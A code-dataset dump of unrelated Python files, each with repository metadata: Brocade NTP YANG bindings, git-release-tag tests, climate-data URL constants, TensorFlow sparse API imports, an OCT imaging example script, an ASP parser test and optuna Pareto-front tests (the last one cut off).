t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'chassis-ip': {'value': 1}, u'mm-ip': {'value': 2}},), default=unicode("mm-ip"), is_leaf=True, yang_name="source-ip", rest_name="source-ip", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure the source ip to be used for NTP', u'cli-full-command': None, u'callpoint': u'ntp_srcip_cp'}}, namespace='urn:brocade.com:mgmt:brocade-ntp', defining_module='brocade-ntp', yang_type='srcip_type', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """source_ip must be of a type compatible with srcip_type""",
'defined-type': "brocade-ntp:srcip_type",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'chassis-ip': {'value': 1}, u'mm-ip': {'value': 2}},), default=unicode("mm-ip"), is_leaf=True, yang_name="source-ip", rest_name="source-ip", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure the source ip to be used for NTP', u'cli-full-command': None, u'callpoint': u'ntp_srcip_cp'}}, namespace='urn:brocade.com:mgmt:brocade-ntp', defining_module='brocade-ntp', yang_type='srcip_type', is_config=True)""",
})
self.__source_ip = t
if hasattr(self, '_set'):
self._set()
def _unset_source_ip(self):
self.__source_ip = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'chassis-ip': {'value': 1}, u'mm-ip': {'value': 2}},), default=unicode("mm-ip"), is_leaf=True, yang_name="source-ip", rest_name="source-ip", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure the source ip to be used for NTP', u'cli-full-command': None, u'callpoint': u'ntp_srcip_cp'}}, namespace='urn:brocade.com:mgmt:brocade-ntp', defining_module='brocade-ntp', yang_type='srcip_type', is_config=True)
server = __builtin__.property(_get_server, _set_server)
authentication_key = __builtin__.property(_get_authentication_key, _set_authentication_key)
source_ip = __builtin__.property(_get_source_ip, _set_source_ip)
_pyangbind_elements = {'server': server, 'authentication_key': authentication_key, 'source_ip': source_ip, }
| 91.94359 | 1,295 | 0.714429 | 2,601 | 17,929 | 4.74356 | 0.074971 | 0.03242 | 0.062247 | 0.038904 | 0.830929 | 0.807748 | 0.798347 | 0.791295 | 0.791295 | 0.783514 | 0 | 0.002952 | 0.130794 | 17,929 | 194 | 1,296 | 92.417526 | 0.788758 | 0.07909 | 0 | 0.415385 | 0 | 0.023077 | 0.439212 | 0.170866 | 0 | 0 | 0 | 0 | 0 | 1 | 0.092308 | false | 0 | 0.076923 | 0 | 0.3 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
079a2b8d2bddffed4d3d6417f0ea3a73793a55d0 | 2,008 | py | Python | tests/test_initialize.py | binxio/git-release-tag | 1edf6e4401eaf4d900d0a6a1bca61ec56496d675 | [
"Apache-2.0"
] | 2 | 2020-03-18T11:59:56.000Z | 2022-03-29T10:53:32.000Z | tests/test_initialize.py | binxio/git-release-tag | 1edf6e4401eaf4d900d0a6a1bca61ec56496d675 | [
"Apache-2.0"
] | null | null | null | tests/test_initialize.py | binxio/git-release-tag | 1edf6e4401eaf4d900d0a6a1bca61ec56496d675 | [
"Apache-2.0"
] | null | null | null | import pytest
import os
import uuid
from git_release_tag.release_info import ReleaseInfo
def test_initialize_outside_a_workspace():
topdir = f"/tmp/git-release-tag/init/{uuid.uuid4()}"
directories = [os.path.join(topdir, "a"), os.path.join(topdir, "b"), topdir]
ctx = {"obj": {"dry_run": True, "verbose": True}}
for dir in directories:
os.makedirs(dir, exist_ok=True)
for i, dir in enumerate(directories):
ReleaseInfo.initialize(
directory=dir,
semver=f"0.{i}.0",
base_tag=(os.path.basename(dir) + "-"),
pre_tag_command="echo @@RELEASE@@ > release.txt",
dry_run=False,
)
info = ReleaseInfo(path=dir)
assert info.pre_tag_command == "echo @@RELEASE@@ > release.txt"
assert info.base_tag == os.path.basename(dir) + "-"
assert info.semver == f"0.{i}.0"
assert info.directory == dir
assert info.path == os.path.join(dir, ".release")
assert not info.is_inside_work_tree
def test_initialize_in_workspace():
topdir = f"/tmp/git-release-tag/init/{uuid.uuid4()}"
directories = [os.path.join(topdir, "a"), os.path.join(topdir, "b"), topdir]
ctx = {"obj": {"dry_run": True, "verbose": True}}
for dir in directories:
os.makedirs(dir, exist_ok=True)
info = ReleaseInfo(path=topdir)
info.git_init()
for i, dir in enumerate(directories):
ReleaseInfo.initialize(
directory=dir,
semver=f"0.{i}.0",
base_tag=(os.path.basename(dir) + "-"),
pre_tag_command="echo @@RELEASE@@ > release.txt",
dry_run=False,
)
info = ReleaseInfo(path=dir)
assert info.is_inside_work_tree
assert info.pre_tag_command == "echo @@RELEASE@@ > release.txt"
assert info.base_tag == os.path.basename(dir) + "-"
assert info.semver == f"0.{i}.0"
assert info.directory == dir
assert info.path == os.path.join(dir, ".release")
| 37.886792 | 80 | 0.603088 | 263 | 2,008 | 4.471483 | 0.209125 | 0.093537 | 0.05102 | 0.054422 | 0.860544 | 0.829932 | 0.829932 | 0.829932 | 0.829932 | 0.829932 | 0 | 0.006601 | 0.245518 | 2,008 | 52 | 81 | 38.615385 | 0.769637 | 0 | 0 | 0.75 | 0 | 0 | 0.14243 | 0.039841 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.041667 | false | 0 | 0.083333 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ed2f89b1a3e0339302490c19f601cc005bb534e8 | 7,152 | py | Python | myIngrid/data_lib.py | wy2136/wython | 0eaa9db335d57052806ae956afe6a34705407628 | [
"MIT"
] | 1 | 2022-03-21T21:24:40.000Z | 2022-03-21T21:24:40.000Z | myIngrid/data_lib.py | wy2136/wython | 0eaa9db335d57052806ae956afe6a34705407628 | [
"MIT"
] | null | null | null | myIngrid/data_lib.py | wy2136/wython | 0eaa9db335d57052806ae956afe6a34705407628 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
@author: yang
"""
from . import data_lib_iri
from .data_lib_iri import *
# ######## data paths on the Columbia data library.
# climate index
mjo_phase = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.climate_index/.MJO_index.nc/.phase'
mjo_amplitude = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.climate_index/.MJO_index.nc/.amplitude'
# time series
itcz_states_daily = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ITCZ_states/.itcz_daily.nc/.n'
itcz_states = itcz_states_daily
itcz_states_3hourly = 'http://strega.ldeo.columbia.edu:81http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ITCZ_states/.itcz_3hourly.nc/.n'
# surface
# monthly
qu_int_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.Surface/.qu.int.nc/.int_qu'
qv_int_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.Surface/.qv.int.nc/.int_qv'
sic_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.Surface/.sic.nc/.ci'
# daily
hfls_daily_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.hfls.nc/.slhf'
hfls_daily_anom_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.hfls.ydayanom.nc/.slhf'
hfss_daily_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.hfss.nc/.sshf'
hfss_daily_anom_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.hfss.ydayanom.nc/.sshf'
pr_daily_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.prcp.daily.nc/.prcp'
pr_daily_anom_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.prcp.daily.ydayanom.nc/.prcp'
rlns_daily_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.rlns.nc/.str'
rlns_daily_anom_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.rlns.ydayanom.nc/.str'
rsns_daily_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.rsns.nc/.ssr'
rsns_daily_anom_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.rsns.ydayanom.nc/.ssr'
u10_daily_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.u10.daily.nc/.U10'
u10_daily_anom_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.u10.daily.ydayanom.nc/.U10'
v10_daily_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.v10.daily.nc/.V10'
v10_daily_anom_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.v10.daily.ydayanom.nc/.V10'
wind10_daily_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.wind10.daily.nc/.WIND10'
wind10_daily_anom_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.wind10.daily.ydayanom.nc/.WIND10'
# OLR
olr_daily = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.olr/.olr.day.mean.nc/.olr'
olr_daily_anom = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.olr/.olr.day.anom.nc/.olr'
# SST
oisst2 = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.sst/.oisst.nc/.sst'
oisst2_anom = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.sst/.oisst.ydayanom.nc/.sst'
oisst2_monanom = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.sst/.oisst.monanom.nc/.sst'
# pressure levels
div_daily_200mb_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.div.daily.200mb.nc/.D'
div_daily_anom_200mb_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.div.daily.ydayanom.200mb.nc/.D'
phi_daily_200mb_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.phi.daily.200mb.nc/.VP'
phi_daily_anom_200mb_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.phi.daily.ydayanom.200mb.nc/.VP'
phi_daily_850mb_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.phi.daily.850mb.nc/.VP'
phi_daily_anom_850mb_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.phi.daily.ydayanom.850mb.nc/.VP'
psi_daily_200mb_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.psi.daily.200mb.nc/.SF'
psi_daily_anom_200mb_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.psi.daily.ydayanom.200mb.nc/.SF'
psi_daily_850mb_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.psi.daily.850mb.nc/.SF'
psi_daily_anom_850mb_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.psi.daily.ydayanom.850mb.nc/.SF'
q_daily_850mb_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.q.daily.850mb.nc/.q'
q_daily_anom_850mb_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.q.daily.ydayanom.850mb.nc/.q'
qu_daily_850mb_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.qu.daily.850mb.nc/.qu'
qu_daily_anom_850mb_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.qu.daily.ydayanom.850mb.nc/.qu'
qv_daily_850mb_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.qv.daily.850mb.nc/.qv'
qv_daily_anom_850mb_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.qv.daily.ydayanom.850mb.nc/.qv'
u_daily_200mb_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.u.daily.200mb.nc/.U'
u_daily_anom_200mb_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.u.daily.ydayanom.200mb.nc/.U'
u_daily_850mb_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.u.daily.850mb.nc/.U'
u_daily_anom_850mb_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.u.daily.ydayanom.850mb.nc/.U'
v_daily_200mb_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.v.daily.200mb.nc/.V'
v_daily_anom_200mb_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.v.daily.ydayanom.200mb.nc/.V'
v_daily_850mb_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.v.daily.850mb.nc/.V'
v_daily_anom_850mb_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.v.daily.ydayanom.850mb.nc/.V'
zeta_daily_850mb_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.zeta.850mb.nc/.zeta'
zeta_daily_anom_850mb_erai = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home/.ERAInterim/.daily/.zeta.ydayanom.850mb.nc/.zeta'
| 90.531646 | 152 | 0.756991 | 1,142 | 7,152 | 4.597198 | 0.071804 | 0.104762 | 0.188571 | 0.22 | 0.84419 | 0.819238 | 0.819238 | 0.819238 | 0.819238 | 0.819238 | 0 | 0.044425 | 0.030621 | 7,152 | 78 | 153 | 91.692308 | 0.712823 | 0.021113 | 0 | 0 | 0 | 0.947368 | 0.797735 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.035088 | 0 | 0.035088 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
92f2517402c848774d550e1fdf1d543b010cef87 | 2,686 | py | Python | Lib/site-packages/tensorflow_core/_api/v2/sparse/__init__.py | caiyongji/py36-tf2.0rc | c5b4b364ba14214534228570e58ef96b1a8bb6dc | [
"CNRI-Python-GPL-Compatible"
] | null | null | null | Lib/site-packages/tensorflow_core/_api/v2/sparse/__init__.py | caiyongji/py36-tf2.0rc | c5b4b364ba14214534228570e58ef96b1a8bb6dc | [
"CNRI-Python-GPL-Compatible"
] | null | null | null | Lib/site-packages/tensorflow_core/_api/v2/sparse/__init__.py | caiyongji/py36-tf2.0rc | c5b4b364ba14214534228570e58ef96b1a8bb6dc | [
"CNRI-Python-GPL-Compatible"
] | null | null | null | # This file is MACHINE GENERATED! Do not edit.
# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.
"""Sparse Tensor Representation.
See also `tf.SparseTensor`.
"""
from __future__ import print_function as _print_function
import sys as _sys
from tensorflow.python.framework.sparse_tensor import SparseTensor
from tensorflow.python.ops.array_ops import sparse_mask as mask
from tensorflow.python.ops.math_ops import sparse_segment_mean_v2 as segment_mean
from tensorflow.python.ops.math_ops import sparse_segment_sqrt_n_v2 as segment_sqrt_n
from tensorflow.python.ops.math_ops import sparse_segment_sum_v2 as segment_sum
from tensorflow.python.ops.sparse_ops import _sparse_cross as cross
from tensorflow.python.ops.sparse_ops import _sparse_cross_hashed as cross_hashed
from tensorflow.python.ops.sparse_ops import from_dense
from tensorflow.python.ops.sparse_ops import sparse_add_v2 as add
from tensorflow.python.ops.sparse_ops import sparse_concat_v2 as concat
from tensorflow.python.ops.sparse_ops import sparse_expand_dims as expand_dims
from tensorflow.python.ops.sparse_ops import sparse_eye as eye
from tensorflow.python.ops.sparse_ops import sparse_fill_empty_rows as fill_empty_rows
from tensorflow.python.ops.sparse_ops import sparse_maximum as maximum
from tensorflow.python.ops.sparse_ops import sparse_minimum as minimum
from tensorflow.python.ops.sparse_ops import sparse_reduce_max_v2 as reduce_max
from tensorflow.python.ops.sparse_ops import sparse_reduce_sum_v2 as reduce_sum
from tensorflow.python.ops.sparse_ops import sparse_reorder as reorder
from tensorflow.python.ops.sparse_ops import sparse_reset_shape as reset_shape
from tensorflow.python.ops.sparse_ops import sparse_reshape as reshape
from tensorflow.python.ops.sparse_ops import sparse_retain as retain
from tensorflow.python.ops.sparse_ops import sparse_slice as slice
from tensorflow.python.ops.sparse_ops import sparse_softmax as softmax
from tensorflow.python.ops.sparse_ops import sparse_split_v2 as split
from tensorflow.python.ops.sparse_ops import sparse_tensor_dense_matmul as sparse_dense_matmul
from tensorflow.python.ops.sparse_ops import sparse_tensor_to_dense as to_dense
from tensorflow.python.ops.sparse_ops import sparse_to_indicator as to_indicator
from tensorflow.python.ops.sparse_ops import sparse_transpose as transpose
del _print_function
from tensorflow.python.util import module_wrapper as _module_wrapper
if not isinstance(_sys.modules[__name__], _module_wrapper.TFModuleWrapper):
_sys.modules[__name__] = _module_wrapper.TFModuleWrapper(
_sys.modules[__name__], "sparse", public_apis=None, deprecation=False,
has_lite=False)
| 53.72 | 94 | 0.861132 | 421 | 2,686 | 5.180523 | 0.2019 | 0.220083 | 0.265933 | 0.284732 | 0.596515 | 0.596515 | 0.596515 | 0.579092 | 0.316827 | 0 | 0 | 0.003267 | 0.088235 | 2,686 | 49 | 95 | 54.816327 | 0.887301 | 0.068876 | 0 | 0 | 1 | 0 | 0.002408 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.861111 | 0 | 0.861111 | 0.055556 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
92fd67bbc324f8e2c07d1b5ca255fe1b7810bf5d | 1,373 | py | Python | examples/all.py | CBORT-NCBIB/oct-cbort | 7f2bc525bb3f5b3bcf2e41622129c87ee710161a | [
"MIT"
] | 2 | 2021-12-16T00:03:19.000Z | 2022-02-21T10:58:39.000Z | examples/all.py | CBORT-NCBIB/oct-cbort | 7f2bc525bb3f5b3bcf2e41622129c87ee710161a | [
"MIT"
] | null | null | null | examples/all.py | CBORT-NCBIB/oct-cbort | 7f2bc525bb3f5b3bcf2e41622129c87ee710161a | [
"MIT"
] | 2 | 2021-11-19T02:32:50.000Z | 2021-12-16T00:05:43.000Z | import os
if os.name == 'nt':
os.system("python -m oct examples//data//1_VL_Benchtop1_rat_nerve_biseg_n2_m5_struct_angio_ps tomo+struct+angio+ps+hsv+proj mgh 1")
print('================ 1/4')
os.system("python -m oct examples//data//2_BL_Catheter1_rat_clot_ramp_struct_ps tomo+struct+ps+proj mgh 1")
print('================ 2/4')
os.system("python -m oct examples//data//3_BL_Catheter2_human_coronary_artery_ramp_struct_ps tomo+struct+ps+proj mgh 1")
print('================ 3/4')
os.system("python -m oct examples//data//4_BL_Benchtop_Phantom_struct_angio_ps tomo+struct+ps+hsv+stokes mgh 1")
print('================ 4/4')
print('Test Complete')
if os.name == 'posix':
os.system("python -m oct examples//data//1_VL_Benchtop1_rat_nerve_biseg_n2_m5_struct_angio_ps tomo+struct+angio+ps+hsv+proj mgh 1")
print('================ 1/4')
os.system("python -m oct examples//data//2_BL_Catheter1_rat_clot_ramp_struct_ps tomo+struct+angio+ps+proj mgh 1")
print('================ 2/4')
os.system("python -m oct examples//data//3_BL_Catheter2_human_coronary_artery_ramp_struct_ps tomo+struct+ps+proj mgh 1")
print('================ 3/4')
os.system("python -m oct examples//data//4_BL_Benchtop_Phantom_struct_angio_ps tomo+struct+ps+hsv+stokes mgh 1")
print('================ 4/4')
print('Test Complete') | 62.409091 | 135 | 0.661326 | 221 | 1,373 | 3.828054 | 0.199095 | 0.085106 | 0.132388 | 0.141844 | 0.963357 | 0.957447 | 0.957447 | 0.957447 | 0.957447 | 0.957447 | 0 | 0.034797 | 0.120903 | 1,373 | 22 | 136 | 62.409091 | 0.666114 | 0 | 0 | 0.761905 | 0 | 0.095238 | 0.759098 | 0.449054 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.047619 | 0 | 0.047619 | 0.47619 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 11 |
132973a8b3fd34d6a668be5e329cef01183e43f6 | 1,693 | py | Python | tests/parser/bug.01.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | tests/parser/bug.01.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | tests/parser/bug.01.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | input = """
h2 :- not h.
h2 :- not h2.
h :- not v2n3,not v2n2,not v2n1.
h :- not v3n3,not v3n2,not v3n1.
h :- not v4n3,not v4n2,not v4n1.
h :- not v5n3,not v5n2,not v5n1.
h :- not v6n3,not v6n2,not v6n1.
v2n1 :- not v4n1,not v3n1,not v2n3,not v2n2.
v2n2 :- not v4n2,not v3n2,not v2n3,not v2n1.
v2n3 :- not v4n3,not v3n3,not v2n2,not v2n1.
v3n1 :- not v5n1,not v2n1,not v3n3,not v3n2.
v3n2 :- not v5n2,not v2n2,not v3n3,not v3n1.
v3n3 :- not v5n3,not v2n3,not v3n2,not v3n1.
v4n1 :- not v6n1,not v5n1,not v2n1,not v4n3,not v4n2.
v4n2 :- not v6n2,not v5n2,not v2n2,not v4n3,not v4n1.
v4n3 :- not v6n3,not v5n3,not v2n3,not v4n2,not v4n1.
s :- h2.
s :- v2n1.
s :- v2n2.
s :- v2n3.
s :- v3n1.
s :- v3n2.
s :- v3n3.
s :- v4n1.
s :- v4n2.
s :- v4n3.
s :- v5n1.
s :- v5n2.
s :- v5n3.
s :- v6n1.
s :- v6n2.
s :- v6n3.
"""
output = """
h2 :- not h.
h2 :- not h2.
h :- not v2n3,not v2n2,not v2n1.
h :- not v3n3,not v3n2,not v3n1.
h :- not v4n3,not v4n2,not v4n1.
h :- not v5n3,not v5n2,not v5n1.
h :- not v6n3,not v6n2,not v6n1.
v2n1 :- not v4n1,not v3n1,not v2n3,not v2n2.
v2n2 :- not v4n2,not v3n2,not v2n3,not v2n1.
v2n3 :- not v4n3,not v3n3,not v2n2,not v2n1.
v3n1 :- not v5n1,not v2n1,not v3n3,not v3n2.
v3n2 :- not v5n2,not v2n2,not v3n3,not v3n1.
v3n3 :- not v5n3,not v2n3,not v3n2,not v3n1.
v4n1 :- not v6n1,not v5n1,not v2n1,not v4n3,not v4n2.
v4n2 :- not v6n2,not v5n2,not v2n2,not v4n3,not v4n1.
v4n3 :- not v6n3,not v5n3,not v2n3,not v4n2,not v4n1.
s :- h2.
s :- v2n1.
s :- v2n2.
s :- v2n3.
s :- v3n1.
s :- v3n2.
s :- v3n3.
s :- v4n1.
s :- v4n2.
s :- v4n3.
s :- v5n1.
s :- v5n2.
s :- v5n3.
s :- v6n1.
s :- v6n2.
s :- v6n3.
"""
| 24.536232 | 54 | 0.608978 | 322 | 1,693 | 3.201863 | 0.065217 | 0.081474 | 0.096993 | 0.054316 | 0.989331 | 0.989331 | 0.989331 | 0.989331 | 0.989331 | 0.989331 | 0 | 0.242976 | 0.222091 | 1,693 | 68 | 55 | 24.897059 | 0.539863 | 0 | 0 | 0.970588 | 0 | 0 | 0.98097 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
13964ed4a17d7aef1134965daeef986767697a24 | 3,575 | py | Python | tests/test_multi_objective.py | captain-pool/optuna | 2ae8c17afea54362460320870304c763e91c0596 | [
"MIT"
] | 1,300 | 2018-12-03T06:11:11.000Z | 2019-11-15T01:28:25.000Z | tests/test_multi_objective.py | captain-pool/optuna | 2ae8c17afea54362460320870304c763e91c0596 | [
"MIT"
] | 274 | 2018-12-04T09:54:07.000Z | 2019-11-15T02:23:18.000Z | tests/test_multi_objective.py | captain-pool/optuna | 2ae8c17afea54362460320870304c763e91c0596 | [
"MIT"
] | 148 | 2018-12-03T10:48:50.000Z | 2019-11-11T16:37:51.000Z | from typing import Tuple
from optuna import create_study
from optuna.study._multi_objective import _get_pareto_front_trials_2d
from optuna.study._multi_objective import _get_pareto_front_trials_nd
from optuna.trial import FrozenTrial
def _trial_to_values(t: FrozenTrial) -> Tuple[float, ...]:
assert t.values is not None
return tuple(t.values)
def test_get_pareto_front_trials_2d() -> None:
study = create_study(directions=["minimize", "maximize"])
assert {
_trial_to_values(t) for t in _get_pareto_front_trials_2d(study.trials, study.directions)
} == set()
study.optimize(lambda t: [2, 2], n_trials=1)
assert {
_trial_to_values(t) for t in _get_pareto_front_trials_2d(study.trials, study.directions)
} == {(2, 2)}
study.optimize(lambda t: [1, 1], n_trials=1)
assert {
_trial_to_values(t) for t in _get_pareto_front_trials_2d(study.trials, study.directions)
} == {(1, 1), (2, 2)}
study.optimize(lambda t: [3, 1], n_trials=1)
assert {
_trial_to_values(t) for t in _get_pareto_front_trials_2d(study.trials, study.directions)
} == {(1, 1), (2, 2)}
study.optimize(lambda t: [3, 2], n_trials=1)
assert {
_trial_to_values(t) for t in _get_pareto_front_trials_2d(study.trials, study.directions)
} == {(1, 1), (2, 2)}
study.optimize(lambda t: [1, 3], n_trials=1)
assert {
_trial_to_values(t) for t in _get_pareto_front_trials_2d(study.trials, study.directions)
} == {(1, 3)}
assert len(_get_pareto_front_trials_2d(study.trials, study.directions)) == 1
study.optimize(lambda t: [1, 3], n_trials=1) # The trial result is the same as the above one.
assert {
_trial_to_values(t) for t in _get_pareto_front_trials_2d(study.trials, study.directions)
} == {(1, 3)}
assert len(_get_pareto_front_trials_2d(study.trials, study.directions)) == 2
def test_get_pareto_front_trials_nd() -> None:
study = create_study(directions=["minimize", "maximize", "minimize"])
assert {
_trial_to_values(t) for t in _get_pareto_front_trials_nd(study.trials, study.directions)
} == set()
study.optimize(lambda t: [2, 2, 2], n_trials=1)
assert {
_trial_to_values(t) for t in _get_pareto_front_trials_nd(study.trials, study.directions)
} == {(2, 2, 2)}
study.optimize(lambda t: [1, 1, 1], n_trials=1)
assert {
_trial_to_values(t) for t in _get_pareto_front_trials_nd(study.trials, study.directions)
} == {
(1, 1, 1),
(2, 2, 2),
}
study.optimize(lambda t: [3, 1, 3], n_trials=1)
assert {
_trial_to_values(t) for t in _get_pareto_front_trials_nd(study.trials, study.directions)
} == {
(1, 1, 1),
(2, 2, 2),
}
study.optimize(lambda t: [3, 2, 3], n_trials=1)
assert {
_trial_to_values(t) for t in _get_pareto_front_trials_nd(study.trials, study.directions)
} == {
(1, 1, 1),
(2, 2, 2),
}
